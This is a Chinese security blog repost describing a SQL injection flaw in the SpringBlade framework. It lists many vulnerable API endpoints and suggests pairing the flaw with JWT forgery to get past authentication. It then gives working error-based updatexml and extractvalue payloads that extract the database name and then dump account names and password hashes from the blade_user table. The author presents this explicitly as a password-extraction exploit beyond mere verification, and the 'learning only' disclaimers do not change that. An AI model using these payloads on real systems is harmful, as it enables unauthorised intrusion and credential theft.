Springblade SQL注入漏洞

admin 2024年9月22日14:07:37评论19 views字数 1047阅读3分29秒阅读模式
前言
申明本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!网上所有spring blade注入的文章都只是验证poc,笔者HW遇到了,所以这里写下注入出系统密码的exp。

Part 1 漏洞描述
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpingBoot 单体式微服务架构并存的综合型项目。SpringBlade /api/blade-user/export-user 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。

SpringBlade 有很多个路径存在SQL注入,不仅限本次复现的接口。

有时候接口需要Blade-Auth头鉴权,不过没事,可以搭配SpringBladeJWT身份伪造漏洞。

/api/blade-user/list/api/blade-develop/code/list/api/blade-desk/notice/list/api/blade-resource/oss/list/api/blade-system/dict-biz/list/api/blade-system/menu/menu-list/api/blade-develop/datasource/list/api/blade-log/usual/list/api/blade-user/export-user/api/blade-user/user-list/api/blade-log/error/lis
Part 2 漏洞复现
1-updatexml(1,concat(0x7e,database(),0x7e),1)=1

或者

1-extractvalue(1,concat(0x7e,database(),0x7e))=1

得到数据库名

Springblade SQL注入漏洞

注入出密码

1-updatexml(1,concat(0x7e,(select+group_concat(account,0x7e,password)+from+数据库名.blade_user),1),1)=11-extractvalue(1,concat(0x7e,(select+group_concat(account,0x7e,password)+from+数据库名.blade_user),1))=1

图里用的 /**/代替空格,用+号也可以Springblade SQL注入漏洞Springblade SQL注入漏洞

Springblade SQL注入漏洞
Springblade SQL注入漏洞

原文始发于微信公众号(F12sec):【漏洞复现】Springblade SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月22日14:07:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Springblade SQL注入漏洞https://cn-sec.com/archives/3136827.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息